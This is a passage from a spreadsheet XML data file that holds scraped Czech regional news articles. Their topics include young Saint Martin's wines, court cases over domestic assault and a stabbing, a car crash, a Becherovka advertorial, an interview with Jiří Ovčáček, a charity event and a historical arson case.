Národního vinařského centra to vidí podobně. „Kvalita letošních svatomartinských vín je lepší. Červená vína mají krásné, temně rubínové barvy. Růžová chutnají příjemně jogurtově. Bílá jsou vyváženě ovocná,“ shrnul vzorky, které se sešly před komisi hodnotící vína pro značku Svatomartinské. Díky vyšší cukernatosti při sběru mnohá vína nejsou zas až tak lehká, obsah alkoholu je podle Gondáše na hranici toho, co podmínky svatomartinských vín dovolují – u bílých a růžových 12,5 a u červených 13 procent alkoholu . Kyselinka u mladých vín nechybí, vína tak nebudou fádní. Vinaři ještě před koncem října začali stáčet svatomartinská vína do lahví. „V Château Valtice plánujeme nalahvovat sto tisíc lahví svatomartinského vína . Dalších patnáct tisíc ve Vinařství Kovacs,“ sdělil David Šťastný, ředitel valtického vinařství, kde udržují nejdelší tradici výroby mladých vín. NABÍDKU ZÚŽILY MRAZY Na trh loni přišlo celkem více než dva miliony svatomartinských vín. Letos podle všeho rekord nepadne, naopak vína bude možná výrazně méně. Úrodu totiž značně ovlivnily jarní mrazy. Nižší výnosy se podle vinařů projevily zvlášť u hroznů tradičně určených pro mladá a svatomartinská vína . Obzvlášť zle dopadli vinaři se sklizní v Čechách . „V letošní nabídce mladých vín nám bude chybět tradiční Müller Thurgau. Přesto jsme hrozny, které se nám podařilo zachránit, sklízeli v perfektní kondici, s vysokou cukernatostí a ideálním množstvím kyselin,“ konstatovala výrobní ředitelka Vinných sklepů Kutná Hora Soňa Podholová.</t>
  </si>
  <si>
    <t>21170</t>
  </si>
  <si>
    <t>20241101_558_3240963982_d2f2b47d295c7fcf2678.html</t>
  </si>
  <si>
    <t>d2f2b47d295c7fcf2678</t>
  </si>
  <si>
    <t>Brutální útok sekerou ve Sněžném. Násilník se vrátil a zbil sestru</t>
  </si>
  <si>
    <t>Brutální útok sekerou ve Sněžném. Násilník se vrátil a zbil sestru žďárský roman martínek Doslova horor prožívali jeho příbuzní před lety a podle obvinění, které má aktuálně muž na krku, v násilí pokračoval i letos. Útočil v obci Sněžné na Žďársku. Už dříve surově týral své rodiče a na sestru vzal sekeru. Situaci v roce 2014 musel řešit policejní vyjednavač. Spouštěčem agrese býval alkohol a drogy. Nechybělo mnoho a před soudem by stál za pokus o vraždu. Nakonec dostal čtyři a půl roku za pokus o těžkou újmu na zdraví. Z vězení byl propuštěn po roce a půl. Nyní dvaatřicetiletý muž stojí před soudem znovu. „Letos v únoru surově napadl svoji sestru. Za pokus o těžkou újmu a porušování domovní svobody hrozí obžalovanému trest od pěti do dvanácti let. Obdobný čin totiž spáchal opětovně,“ konstatoval žalobce Jan Adam z jihlavské pobočky Krajského státního zastupitelství v Brně. Aktuální běsnění obžalovaného se odehrálo letos 10. února před půlnocí v obci Sněžné na Žďársku. ZA VLASY JI DOTÁHL DO KUCHYNĚ Obviněný se nejprve dostal do hádky se svou sestrou v kuchyni rodinného domu své příbuzné. Sestra měla z bratra takové obavy, že na pomoc zavolala policii. Hlídce z Nového Města na Moravě násilník slíbil, že se vrátí domů. Jenže když policisté odjeli, obžalovaný se vrátil k domu sestry a podle obžaloby rozbil okno a mlátil na vchodové dveře. Když už to sestra nevydržela a pootevřela dveře, muž ji zatlačil do domu a za vlasy ji dotáhl do kuchyně, rizikového místa všech domácích hádek. „Obžalovaný poškozenou povalil na zem a opakovaně jí vyhrožoval, že ji zabije, podřízne, rozpárá a rozbije jí hubu. Přitom ji nejméně desetkrát udeřil sevřenou pěstí do hlavy a dalších částí těla i přes prosby poškozené, aby přestal. Muž naopak v útoku pokračoval a opakovaně ji kopal do hlavy a dalších částí těla,“ popsal v obžalobě žalobce Adam. Žena musela do nemocnice se středně těžkými zraněními hlavy. Podle znalců ale mohla po tak surovém útoku utrpět mnohem závažnější zranění mozku a obličejových kostí, k čemuž nakonec nedošlo jen díky aktivní obraně poškozené. ZA JEHO AGRESI MOHL ALKOHOL Motivem činu byly údajné dlouhodobé rodinné neshody. Spouštěčem agrese u obžalovaného býval především alkohol . Znalci ale muži nenavrhují žádné léčení, protože na alkoholu není závislý a nemělo by to cenu. Hlavní líčení bude pokračovat v listopadu. Vyslechnuta by měla být poškozená a znalec. Obviněný muž je stíhán vazebně.</t>
  </si>
  <si>
    <t>20241101_559_3240963984_ef56af553e6332392028.html</t>
  </si>
  <si>
    <t>ef56af553e6332392028</t>
  </si>
  <si>
    <t>Na průtahu Třebíčí se srazila 4 auta</t>
  </si>
  <si>
    <t>Na průtahu Třebíčí se srazila 4 auta Třebíč Nehoda se stala v úterý před šestou hodinou ranní. Řidička fordu jela Pražskou ulicí směrem k ulici Kanciborek . „Za železničním přejezdem narazila do zadní části automobilu Hyundai, jehož řidič zastavil z důvodů situace vyvolané silničním provozem. Náraz vozidlo posunul vpřed a hyundai narazil ještě do zadní části automobilu renault. Také renault byl poté odražen a narazil do zadní části dalšího vozidla před ním,“ popsala policejní mluvčí Jana Kroutilová . Při nehodě se jeden z řidičů zranil. Škoda je přibližně sedmdesát tisíc korun. Dechové zkoušky na alkohol byly u všech negativní. Šestatřicetiletá řidička vozidla ford, která nehodu zavinila, dostala na místě pokutu.</t>
  </si>
  <si>
    <t>20241101_56_3264631540_66c2838080a204efecdb.html</t>
  </si>
  <si>
    <t>66c2838080a204efecdb</t>
  </si>
  <si>
    <t>VYCHUTNEJTE SI VÁNOCE S JEDINEČNOU HOŘKOSLADKOU CHUTÍ LIKÉRU BECHEROVKA</t>
  </si>
  <si>
    <t>VYCHUTNEJTE SI VÁNOCE S JEDINEČNOU HOŘKOSLADKOU CHUTÍ LIKÉRU BECHEROVKA Vánoce jsou tradičně svátkem klidu a pohody, ale v neposlední řadě také festivalem pestrých chutí a vůní. Proto je Becherovka už po dlouhá staletí součástí českých štědrovečerních tabulí. Jemným bylinným likérem z Karlových Varů si můžete připít v jeho ledově namražené formě anebo jej ochutnat jako součást horkého vánočního punče. Nechejte Vánoce provonět originální směsí bylinek a vychutnejte si advent tak, jak ho máte rádi. Ledová nebo horká? Záleží na vás, skvělé jsou obě! Becherovka se svojí jedinečnou chutí a vůní skvěle hodí k jídlu a nejčastěji ji servírujeme ledově namraženou. Při ochutnání se vám v ústech rozlije výrazná hořká chuť, které dominují tóny hřebíčku a skořice. Po polknutí ucítíte sílu bylin spojenou s příjemnou pomerančovou hořkostí, která je zakončená sladkou tečkou. Pokud sháníte dokonale vyladěný aperitiv či lahodný digestiv pro slavnostní příležitost, ledová Becherovka Original je rozhodně tou správnou volbou. Vánoční punč Becherovka Během chladných zimních měsíců ale možná oceníte Becherovku spíše v jejím vroucím provedení. Bylinný likér v kombinaci s horkým jablečným džusem zahřeje tělo a provoní den tou pravou vánoční atmosférou. A zatímco tajnou recepturu Becherovky znají jen dva lidé ve firmě, o recept na vánoční punč se s vámi rádi podělíme: 500 ml Becherovka Original 1ks směs koření na punč 1 l jablečný mošt šťáva ze 3 citronů 2 lžíce medu 20g másla Do většího hrnce nalijte mošt a citronovou šťávu, vhoďte koření na punč a přiveďte k varu. Stáhněte teplotu, vyjměte sáček s kořením, přidejte med a máslo, nalijte celou Becherovku a prohřejte za stálého míchání. Punč servírujte do hrnků a ozdobte plátkem jablka. Bylinný likér Becherovka je nejstarší značkou alkoholu v historii našeho státu – je v nepřetržité výrobě již od roku 1807. Vyrábí se v Karlových Varech podle stále stejné a utajované receptury, z 20 různých druhů bylin a koření z celého světa. Doporučená cena: Becherovka 0,5 l – 229,-Kč Autor: admin Rubrika transition_slide Doporučujeme</t>
  </si>
  <si>
    <t>843</t>
  </si>
  <si>
    <t>795</t>
  </si>
  <si>
    <t>20241101_560_3240963981_1ba59d995d1aa643f613.html</t>
  </si>
  <si>
    <t>1ba59d995d1aa643f613</t>
  </si>
  <si>
    <t>Co se dělo po vraždě? Lékaři přijeli až dvě hodiny po ní</t>
  </si>
  <si>
    <t>Co se dělo po vraždě? Lékaři přijeli až dvě hodiny po ní žďárský Nově Město na Moravě Svědci vraždy na ubytovně v Novém Městě na Moravě se podle informací Deníku chovali nestandardně. Lékaři, kteří na místo dorazili, už jen konstatovali smrt devětačtyřicetiletého muže. Otázkou ale zůstává, po jaké době od samotného činu byli k oběti přivoláni. „Podle mých informací to mohlo být až dvě a půl hodiny po činu. Co se dělo mezitím, bude zřejmě ještě předmětem policejního vyšetřování,“ řekl Deníku majitel ubytovny Ladislav Mrkos. Co přesně tím myslí, ale nechtěl víc komentovat. Podle informací Deníku se někteří ze svědků, kterých bylo na místě v té době několik, snažili zakrýt pozadí skutečných událostí. Podle majitele ubytovny spolu muž a žena žili pětadvacet let. Měli mít spolu dvě děti, které ale měly skončit v pěstounské péči. Muž byl podle svědků zvyklý na agresivní chování své přítelkyně. Vztahy se vždy vyhrotily po požívání alkoholu . Svědci mimo jiné tvrdí, že do jejich vztahu nedávno vstoupila třetí osoba. Ta měla být dokonce očitým svědkem toho, když žena svého přítele bodla. Na ubytovně, kde se čin odehrál, bydlí většinou sociálně slabší lidé. Oběť vražedného útoku to se svou přítelkyní neměla lehké ani podle strážníků městské policie. „Co vím, tak pořád vysedávali ve městě na lavičkách a popíjeli. Ne, že by se nějak hlučně projevovali, ale ta paní měla svého přítele poměrně často tlouct,“ řekl Deníku vedoucí tamní městské policie Jiří Hradil .</t>
  </si>
  <si>
    <t>20241101_561_3240963983_8b1b9e6040feaa1d1d80.html</t>
  </si>
  <si>
    <t>8b1b9e6040feaa1d1d80</t>
  </si>
  <si>
    <t>Muž z Třebíče bodl kamaráda nožem do břicha. Přišly ho podpořit desítky známých</t>
  </si>
  <si>
    <t>Muž z Třebíče bodl kamaráda nožem do břicha. Přišly ho podpořit desítky známých Podle obžaloby měl Lubomír Z. vzít na svého kamaráda v jednom z třebíčských bytů kuchyňský nůž a bodnout ho do břicha. Za pokus o vraždu mu nyní hrozí trest od deseti do osmnácti let. třebíčský roman martínek Třebíč Pláč se přitom ozýval i z řad publika. K soudu přišlo obžalovaného podpořit na čtyřicet jeho známých a příbuzných. „Je mi to strašně líto. Ani sám nevím, proč jsem to udělal. Byl to můj nejlepší kamarád. Navzájem jsme si pomáhali,“ vzlykal u soudu Lubomír Z. Za pokus o vraždu mu nyní hrozí trest od deseti do osmnácti let. Není ale vyloučeno, že od soudu odejde s mnohem mírnějším trestem. Zámek totiž nečekaně přiznal vinu za čin, který se stal letos 1. dubna před půlnocí. Podle obžaloby měl Lubomír Z. vzít na svého kamaráda v jednom z třebíčských bytů kuchyňský nůž a bodnout ho do břicha. Když nůž z těla oběti vytahoval, způsobil muži další vážná poranění. „Poškozený přišel o čtyři orgány v těle a vážné zdravotní problémy bude mít do konce života,“ podotkl žalobce Jan Adam. Kvůli čemu se muži pohádali, je dodnes záhadou. Bodnutí ale měla předcházet slovní a fyzická rozepře. „Co bylo přesnou příčinou sporu, není jasné. Poškozený se snad snažil obžalovaného dostat z bytu, protože měl být opilý a agresivní,“ poznamenal Adam. Pro obžalovaného navrhl desetiletý trest. Obhájce považuje za spravedlivý trest osm a půl roku. Znalci ve svých posudcích potvrdili, že alkohol u obžalovaného odbourává agresivní rysy jeho povahy. Hodinu a půl po činu měl v krvi necelé dvě promile alkoholu . Podle znalců ale není alkoholik ani závislý na jiných návykových látkách. Měl by se však zdržet požívání alkoholu . Lubomír Z. má dobré hodnocení z vazby. V rejstříku trestů má tři záznamy. V jednom případě byl odsouzen za pokus o těžkou újmu na zdraví. Rozsudek padne 8. listopadu. Soud si chce ještě nechat všechny okolnosti případu projít hlavou.</t>
  </si>
  <si>
    <t>20241101_562_3240956415_0f5020320bc708a72681.html</t>
  </si>
  <si>
    <t>0f5020320bc708a72681</t>
  </si>
  <si>
    <t>Jiří Ovčáček ve Varech: O Miloši Zemanovi, alkoholu i manželce</t>
  </si>
  <si>
    <t>Jiří Ovčáček ve Varech: O Miloši Zemanovi , alkoholu i manželce Radka Bárová Po odchodu z veřejného života zmizel mluvčí exprezidenta Miloše Zemana Jiří Ovčáček z hledáčku médií. Kde se teď nachází, co dělá a proč se stáhl do ústraní? V exkluzivním otevřeném rozhovoru, který vznikl při jeho návštěvě Karlových Varů , prozradil nejen detaily ze svého osobního a pracovního života, ale také to, že má k lázeňskému městu vřelý vztah, protože zde bydlela jeho babička. Jiří Ovčáček nezveřejňuje fotografie z rodinného soukromí, avšak pro Deník udělal výjimku. Nechte se překvapit, co vše Deníku prozradil. Kam jste se stáhl z politického dění po skončení vaší role mluvčího prezidenta? Po deseti letech nastal čas, na který jsem se těšil. Dny, kdy se nikdo neptá na můj názor, až na výjimky, jako je tento náš rozhovor. Je to blažené, nemuset se vyjadřovat, zaujímat rozhodná stanoviska a promýšlet, jak zareagovat na špílce politické konkurence. A ještě je jeden bonus. Zůstaly mně vzpomínky na čas na Pražském hradě, na tajuplnou Katedrálu a místa, kde velcí mužové tohoto státu prožívali své tragédie. A nesu si s sebou mnohá poučení, třeba o tom, jak umějí dějiny tvrdě a nesmlouvavě vstoupit do životů lidí. Vedu Bohu díky hezký život a dělám vše možné kolem tvůrčí činnosti, od psaní textů po nahrávání podcastů. Pracuji s naším krásným rodným a zpěvavým českým jazykem. Je to nádhera. Plánujete se ještě nějak aktivně vrátit do politiky nebo veřejného života? Nechystám návrat do aktivního politického působení, neplánuji kandidaturu kamkoliv a ve veřejném životě bych rád byl přítomen maximálně svým psaním, ať už žurnalistickým, nebo tvůrčím. Ale to poskrovnu, nejsem žádným velkým autorem. Chystám útlou knížku poezie, je o smíření. Ale to se nechte překvapit. Jaký máte pohled na současnou politickou situaci v Česku? Změnilo se něco od té doby, co jste opustil veřejnou roli? Změnilo se vlastně všechno. Již zmíněné dějiny se nesmlouvavě vlomily sekerou do našich životů a nikoho se neptaly, jestli jsou vítány. Na Ukrajině se kvůli ruské agresi rozhořela velká válka, hoří Izrael , neklid hýbe Afrikou , ale vlastně všemi kontinenty. Svět se mění a o slovo se hlásí souručenství orientálních despocií. Mají sílu, bohatství, nerostné suroviny, levnou pracovní sílu, touhu ovládat. Západ je bez energie a touhy žít. Jen hromady sloganů a hesel. Mám tedy obavy. A mám smutek kvůli Ukrajině . Protože právě kvůli tomuto střetu tolik trpí. Je branou do Evropy , kam se tlačí síla východních krajů . Vše toto ovlivňuje situaci v Česku, mohutně, a bude ještě víc. Nezávidím současnému prezidentovi a premiérovi. Hájí svět, který známe, ale který je ohrožen. Někdy to dělají nešikovně, ale rozumím jim. A to vše ale povede zřejmě k vítězství opozice. Lidé totiž nemají kvůli starostem čas řešit geopolitické otázky. Chtějí hezky žít. Co vás nejvíce překvapilo na životě mimo politiku? Nejsem překvapen, protože i v časech na Pražském hradě jsem cestoval hojně veřejnou dopravou, vlaky, tramvajemi, autobusy, chodil jsem nakupovat pravidelně do obchodů, bavil se s lidmi, a snažil se tedy za každou cenu zachovat si co nejvíce z normálního života. Nebyl jsem opravdu politikem s ochrannou službou, který může ztratit kontakt s běžným životem. Čím se nyní profesně zabýváte? Píšu komentáře pro server ŽivotvČesku.cz, připravuji nově podcast o politice, kultuře a geopolitice Ovčáček Panenka mluví, a věnuji se i propagační činnosti. Pomáhám každý týden panu prezidentovi Miloši Zemanovi v jeho pražské pracovně s mediálními záležitostmi. Dělám tedy několik věcí najednou, kalendář je mým velkým pomocníkem, abych vše sladil. Ale vyhovuje mi to, jsem hodně svobodný. Jaký byl přechod do „normálního“ života mimo politiku? Co vám nejvíc chybí z doby, kdy jste byl ve středu dění? Nechybí mi nic. Prožil jsem zajímavých deset let, věděl jsem, že více mi na Pražském hradě nebude přáno, a tak jsem nebyl překvapen nebo nespokojen. Bylo toho tak akorát a byl by hřích si stýskat nebo žehrat na život. Když jdu přes nádvoří Pražského hradu, cítím svobodu a mám hezké vzpomínky. A do milované Katedrály mohu zajít takřka kdykoliv. Všem to doporučuji. Jak zvládáte tlak veřejného zájmu, který vás stále obklopuje? Rád si s lidmi povídám, a tak žádný tlak nepociťuji. Moc hezky se ke mně lidé chovají a děkuji jim za to. Často slýchám stesky na současnou situaci, tak se snažím hlavně mít mysl otevřenou a nehodnotit, nesoudit nebo nedávat knížecí rady. Máte nyní více času na své zájmy a rodinu? Jak relaxujete? Rodina je pro mne nejdůležitější a snažím se proto si i takto organizovat práci. Bohu díky to zatím jde. Pro mne je čas s rodinou to nejkrásnější na světě širém. Společně chodíme děkovat na mše svaté, společně si užíváme dlouhé procházky přírodou nebo výlety po naší krásné české zemi. Sednout si na sluníčko u kafíčka a povídat si v poklidu a beze spěchu, to je krásné relaxování. Dobrá mysl je moc důležitá pro život. Co vás motivuje v současné době a kde nacházíte inspiraci? Inspiraci nejlépe naleznete v tichu chrámu, před Svatostánkem. Věřte, to není fráze z barvotiskové náboženské brožurky z 19. století. To je zkušenost s Pánem Bohem. A zde je též ona motivace. Přibližovat se, jako člověk hříšný a nehodný, ideálu novozákonnímu, to jest, milovat bližního tak silně, jako miluje Bůh člověka. Měl jste někdy v politice nebo veřejném životě moment, kdy jste se ocitl na pokraji skandálu, o kterém veřejnost nikdy neslyšela? Pokud ano, můžete nám o tom něco prozradit? Se mnou to bylo pikantnější, měl jsem skandál, který se provalil, a to byla má opilecká eskapáda na konci roku 2021. To byla ostuda! Jenže, vše zlé je k něčemu dobré. Dramaticky se mi okamžitě začal měnit život a za pár měsíců jsem poznal svou milovanou manželku. Pán Bůh mi připravil pozoruhodný příběh. Takže co se zdálo nemilé, se obrátilo v nádheru. Existuje něco ve vašem soukromém životě, co by veřejnost překvapilo, kdyby to věděla? Nějaký nezvyklý koníček nebo tajná vášeň? Vy mi tedy dáváte otázky! Mohl bych třeba říci, že mám doma tajný oltář s fotografií Miloše Zemana , u kterého se klaním třikrát každé ráno. Nebo že miluji finskou saunu a šlehání březovými proutky. Se mnou je vlastně nuda. Ale dobře. Když chci mít absolutní klid a pohodu a vypnout, pustím si film se slečnou Marplovou. Anebo si prostě vezmu knížku od Agathy Christie . Mimochodem, víte, že Hercule Poirot byl katolík jako já? Co vás nejvíc přitahuje na Karlových Varech a jaký význam pro vás toto město má? Je to nádherné město s atmosférou, je prodýchané historií, tady se dějiny uměly i zastavit a ty nejmocnější mocnáře na chvíli zastavit v rozletu. Karlovy Vary jsou národní poklad. Nu, však nám ho závidí od Východu po Západ a tuze rádi by si tento klenot přivlastnili. Ale i to k městu patří. Je to slitek vzácného mezinárodního kovu, unikát, kde se setkaly vlivy německé, ruské, anglické, ukrajinské, ale i české. A jako o každý démant je i o Karlovy Vary třeba pečovat! Záleží mi na nich, protože zde žila moje babička, je jí letos 91 let, po druhé světové válce, mezi roku 1946 a 1948. Prožila zde odsun, kdy lidé opouštěli domovy, dodnes je to těžká vzpomínka. Pamatuje nechvalné Rabovací gardy, ale i znovuobrození lázní, velmi rychle se do Karlových Varů vrátil mezinárodní život! Vřídlo je životabudič! Vlastně by Karlovy Vary mohly být krásným symbolem smíření v tomhle rozhašeném světě. Co byste raději: být primátorem Karlových Varů , nebo vést vlastní talk show? A o čem by byla první epizoda? Primátorem Karlových Varů . To by bylo s adrenalinem. A je to třeskuté křeslo, Karlovy Vary vždy byly místem mezinárodních siločar, to není jen tak. A do toho filmový festival, to už je jízda na tygru. Navíc je to opravdu krásné město, ke kterému mám vztah. Jak už jsem uvedl, babička zde bydlela v letech 1946 až 1948. Máte ve svém životě vzor mimo politiku, například v oblasti umění, filozofie nebo náboženství? Kdo je to? Papež František pro lásku k bližním. Kardinál Dominik Duka pro odvahu zastat se bližního. Biskup Josef Hlouch pro touhu objevovat druhým lásku k bližním. Kdyby se vás někdo zeptal na nejlepší životní radu, kterou jste kdy dostal, co by to bylo? A od koho? Jak napsala Agatha Christie v románu Hadí doupě: Vždycky je velká chyba něco říkat, když to není třeba. Co byste vzkázal čtenářům Deníku? Všem čtenářům Deníku přeji, aby jim Pán Bůh žehnal. Protože pak i tu největší tmu protne paprsek sluníčka.</t>
  </si>
  <si>
    <t>36560</t>
  </si>
  <si>
    <t>20241101_563_3240956175_081dcf9fb85fec271420.html</t>
  </si>
  <si>
    <t>081dcf9fb85fec271420</t>
  </si>
  <si>
    <t>Na pomoc Sofince na Makarské vybrali nadšenci 140 tisíc</t>
  </si>
  <si>
    <t>Na pomoc Sofince na Makarské vybrali nadšenci 140 tisíc Šestileté Sofince pomohla parta nadšenců, která si říká Koulevledu. DANIELA LOUDOVÁ Charitativní akce pořádaná partou nadšenců Koulevledu se skvěle vydařila. Pro Sofinku poputuje krásných 140 tisíc korun, které jí pomohou při rehabilitacích a dalších potřebných činnostech. Parta Koulevledu točí nejen odvážná a zábavná videa ve vodě, ale také ráda pomáhá. Uspořádali již druhou charitativní akci, tentokrát na koupališti Makarská u Třebnic . Tam se rozhodli pomoci Sofince, která nemá jednoduchý život. „Sofinka je šestiletá slečna. Při porodu jí byla poškozena mícha, kvůli čemuž má omezený pohyb. Sama neleze, nesedne si, nechodí. Díky intenzivním rehabilitacím ale Sofinka získává sílu v nohou i ručičkách a posouvá se kupředu. Díky tomu, že sílí, může se pohybovat na vozíčku a být samo-statnější. Je to šikovná a trpě-livá bojovnice, která se chce co nejvíce přiblížit vrstevníkům. Musí však cvičit a absolvovat různé terapie, které jsou nákladné, a my chceme rodině pomoci,“ uvedl za Koulevledu Miloslav Pavlis. Rodina Sofinky si pomoci moc váží. „Je to moc fajn, že přišlo tolik lidí. Nejde jen o ty peníze, ale o to, že přišli kvůli Sofince, podpořit ji a nás. Je fajn, že se lidé sejdou kvůli jednomu človíčkovi, kterému chtějí pomoci,“ řekl tatínek Tomáš Zahoř. „Moc nám to pomůže. Peníze budou použity na rehabilitace, které jsou finančně náročné, ergoterapii, Sofinka má ráda koně, takže jezdíme i na ně, a využijeme finance i na lázně,“ doplnila maminka Jana Zahořová. A lidí s dobrým srdcem se sešlo opravdu hodně. Podařilo se během akce vybrat 138 270 Kč, což Koulevledu zaokrouhlí na 140 000 Kč. Jsme moc rádi, že je tady v tom špatném i něco dobrého. Povedlo se nám všem něco skvělého. Na Makarské je úžasná parta lidí a každý do jednoho z nich má obrovské srdíčko, díky všem,“ sdělil Pavlis. PONOR V KOSTÝMECH Lidé přišli podpořit Sofinku a užít si i pestrý program, kde už při příchodu si návštěvníci prohlédli nadupané vozy Dodge, Camaro a další, jejichž majitelé také přihodili nemalou částku na podporu holčičky. Nejen děti, ale i dospělé potěšila přítomnost Alfíka, se kterým se chtěli všichni vyfotit, a i on přispěl velkou částkou za dražbu svých věcí. Stejně tak se strhl zájem o robota Transformers čili Bumblebee. Součástí byl i závod v pití piva . Pak přišel hlavní bod akce, a to ponor v kostýmech, a sešla se skutečně pestrá přehlídka masek.</t>
  </si>
  <si>
    <t>2560</t>
  </si>
  <si>
    <t>20241101_564_3240944928_0d460694edb23e48d8d8.html</t>
  </si>
  <si>
    <t>0d460694edb23e48d8d8</t>
  </si>
  <si>
    <t>V Dluhonicích hořely domy ze msty</t>
  </si>
  <si>
    <t>V Dluhonicích hořely domy ze msty V Dluhonicích bývalo před třicetiletou válkou 31 domů, podle lánového rejstříku z 2. pol. 17. stol. již 35 domů. jiří lapáček Dne 22. 6. 1681 se tu narodil rolníku Ondřeji Buchtovi a jeho manželce Anně syn Pavel . Jak později vzpomínal, měl „2 sestry, jedna má patero dítek, druhá svobodná, od spolubratrů mám 8 (polobratr – bratr, s nímž měl společného jen jednoho rodiče), od polukrve mé sestry 4, matky mé nebožky bratr jeden“. Vyučil se krejčím a tím se také ve vsi živil až do roku 1708. Narůstal v něm ale pocit křivdy, kterou viděl v tom, že mu jeho švagr Václav Šumbera zapřel službu, tj. nechtěl vyplatit 1 zl. 30 krejcarů a devět loktů plátna. Potom že ten Šumbera zadržel jeho matce 6 zl., sestře 5 hřiven a samotnému Buchtovi 4 zl. Nakonec při šití nového kabátku mu na zem spadl vedle ležící starý, který patřil Kateřině Trhlíkové, a zůstal na něm flíček. Povstalo z toho vyšetřování, na jehož základě musel oželet 2 zl. 30 kr. sestřiny služby a jako pokutu peníze, které půjčil Vá-clavu Trhlíkovi, otci Kateřiny. K tomu ještě musel úřadu, který o tom rozhodoval, dát dvě vědra piva jako pokutu. Vrcholem ale bylo, když titíž lidé rozhodli o tom, že jej prodají do Dubu jako rekruta. To se stalo na Tři krále r. 1708, kdy jej odvezli do Brna a předvedli k vojenskému komisaři. Nepamatoval si, ke kterému regimentu byl přidělen, ale na Zelený čtvrtek, když vojsko mělo ležení u Ostřihomi v Uhrách, po večeři utekl, pouze v kamizole, ve spodkách a v punčochách, střevících a klobouku odešel do hor. Pak se vrátil na Moravu , kde pobýval někdy v Dluhonicích , někdy v Rokytnici a v Citově , ale nikde si nebyl jistý. Živil se nádenictvím, také krejčovským řemeslem. Tak to šlo až do osudného večera na sv. Prokopa 4. 7. 1711. Udělal si lunt (doutnák), v Přerově si koupil za dva patáky křesací kamínek a jiskrami z něho zapálil tabák, od něj pak lunt, který pak strčil kolem 23. hod. do stodoly rychtáře Tomáše Mrázka . Potom hned utíkal pryč z dědiny, neboť slyšel, že kdo zapálí, že za ním oheň jde. Následky byly strašlivé. Oheň se rychle rozšířil a strávil 25 domů se stodolami, hovězím dobytkem, ovcemi, vozy, bránami, pluhy, zásobami obilí, konopí, plátna. Rodiny také přišly o šaty a pracovní náčiní. S ohledem na údaje o počtu domů v úvodu byla zni-čena takřka celá ves. Nejstraš-nější ale bylo, že zahynuli lidé. SOUD SE ŽHÁŘEM Pavel Buchta utekl nejprve do Kyjova a odtud, když se mu naskytla možnost, chodil v létě do Rakous , kde se živil nádenictvím, nejčastěji býval v Poštorné . Na podzim dělal došky v Kyjově a v zimě se vracel na dvě neděle do Citova a Brodku. V zimě 1713 před Vánocemi přišel zpátky do Dluhonic , kde bydlel u Jakuba Harny. Zde byl také zadržen, a protože Dluhonice byly součástí panství olomoucké kapituly, byl vsazen 29. 4. 1714 do vězení ve Velké Bystřici , kde se na radnici řešily hrdelní kauzy kapitulních poddaných. Byl vyslechnut 12. června a ke všemu se přiznal. Jednalo se také o příslušnosti soudu, pro-tože šlo o dezertéra, který měl být dodán ke svému regimen-tu. Protože ale nebylo v úředních dokumentech zjištěno, u kterého regimentu sloužil, zůstal ve Velké Bystřici . Z vězení napsal Buchta kapitulnímu rychtáři prosbu tohoto znění: „Pán Bůh s námi. Vzáctnému, slovutnému, urozenému, osvícenému pánu, panu milost Satoriovi, rychtáři slavné kapitoli, má ponížená prosba Pavla Buchty , sirotka z dědiny Dluhonic i ze všemi přáteli mými, kteréž mám, … tak vaši milosti poníženě prosím, abyste se ráčili nade mnú smilovati a ohlédnuti se na mě sirotka jednoho, kterýž nemám pomoci od žádného, jenom od Boha všemohúcího. Protož vašnosti prosím pro přehořké umučení pana Krista, pro sedm bolestí Panny Marie a pro zásluhy všech svatých, aby ode mě přijali ten maličké dar, kterýž moji milí přátelé Vám vašnosti složí, abyste se mnú milostivě nakládali a v tom vězení mě dluho nechovali. S tím Vás Pánu Bohu poručím, já Pavel Buchta , léta 1714 dne 17. junii v Bystřici ve vězení.“ Pokud si myslel, že věc urychlí a že z toho vyjde bez úhony, krutě se mýlil. Ve vězení zůstal celé dva roky. Teprve ráno okolo desáté hodiny 16. 9. 1716 byl předveden před soudce, kteří mu položili mimo jiné tuto otázku: „Je-li tomu také v pravdě, že jsi to schválně z púhej pomsty a zášti učinil, a to pro tou příčinu, že ti, jak jsi povídal, křivdu činili a potom mocně na vojnu vzaly?“ Buchta odpověděl kladně a soudci následně rozhodli, že dotčený delikvent má být předán do rukou mistru popravnímu, vyveden na popravní místo, provazem „zachrtačen“ (zaškrcen) a tím usmrcen, jeho tělo pak spáleno na hranici a proměněno v popel, to vše podle práva. Dne 26. září byl k tomu účelu objednán u olomouckého magistrátu kat. Nejen do Dluhonic přišlo varování, aby se nikdo pod hrozbou přísného trestu neopovážil činit nějakou překážku mistru popravnímu ve vykonání exekuce, tím méně chystat pomstu pro některého ze soudců osobně nebo na jejich majetku. Dne 2. 10. 1716 byl Buchta popraven. Za vlastní exekuci si účtoval kat 7 zl., za čtyři dni mzdy kata a jeho pomocníka, denně 1 zl. 12 kr., celkem 4 zl. 48 kr., za vydržování dvou koní po čtyři dni rovněž 4 zl. 48 kr., celkem 17 zl. 48 kr. Přerovskému soudnímu sluhovi Kristiánu Schopovi pak byly vyplaceny 2 zl 12 kr. za pomocné práce (informace veřejnosti) a výživu po dva dni.</t>
  </si>
  <si>
    <t>2060</t>
  </si>
  <si>
    <t>20241101_565_3240942904_a04c66ab911f81e0ae7a.html</t>
  </si>
  <si>
    <t>a04c66ab911f81e0ae7a</t>
  </si>
  <si>
    <t>Na Silvestra je v divadle vždycky veselo</t>
  </si>
  <si>
    <t>Na Silvestra je v divadle vždycky veselo Silvestrovský večer v divadle mají rádi diváci i herci. Potvrzuje to například Pavel Šupina . „Ta atmosféra je naprosto jedinečná. I když jsem loni nehrál, chtěl jsem být u toho. Pomohl jsem s degustací vína ve foyer a strávil s kolegy a diváky příjemný večer,“ říká herec, který se letos předvede i na jevišti. NA SILVESTRA VŠE DOVOLENO Oblibu silvestrovských večerů potvrzuje i Zdeněk Trčálek , který vloni na Silvestra nechyběl v oceňované komedii Třináctkrát za svědka. „Všichni si o Silvestru rádi vymyslíme na kolegy nějaký ten fórek, protože v tento jediný den je všechno dovoleno. Člověk se na jevišti vyřádí ještě víc než obvykle, smějí se diváci a často i herci,“ usmívá se Zdeněk . VEČER S BOHATÝM PROGRAMEM I OCHUTNÁVKOU VÍNA K silvestrovskému večeru v divadle patří nejen speciální představení, ale i další bohatý program. „Po představení si připijeme s diváky, poděkujeme jim za jejich celoroční přízeň a popřejeme všechno dobré do roku nového. A pak už se všichni společně, tedy diváci, herci i ostatní divadelníci, sejdeme ve foyer, kde bude připravený jako každý rok bohatý raut a ochutnávka vína a strávíme společně jedny z posledních chvil roku 2024,“ prozrazuje ředitelka divadla Libuše Habartová, která si poslední letošní 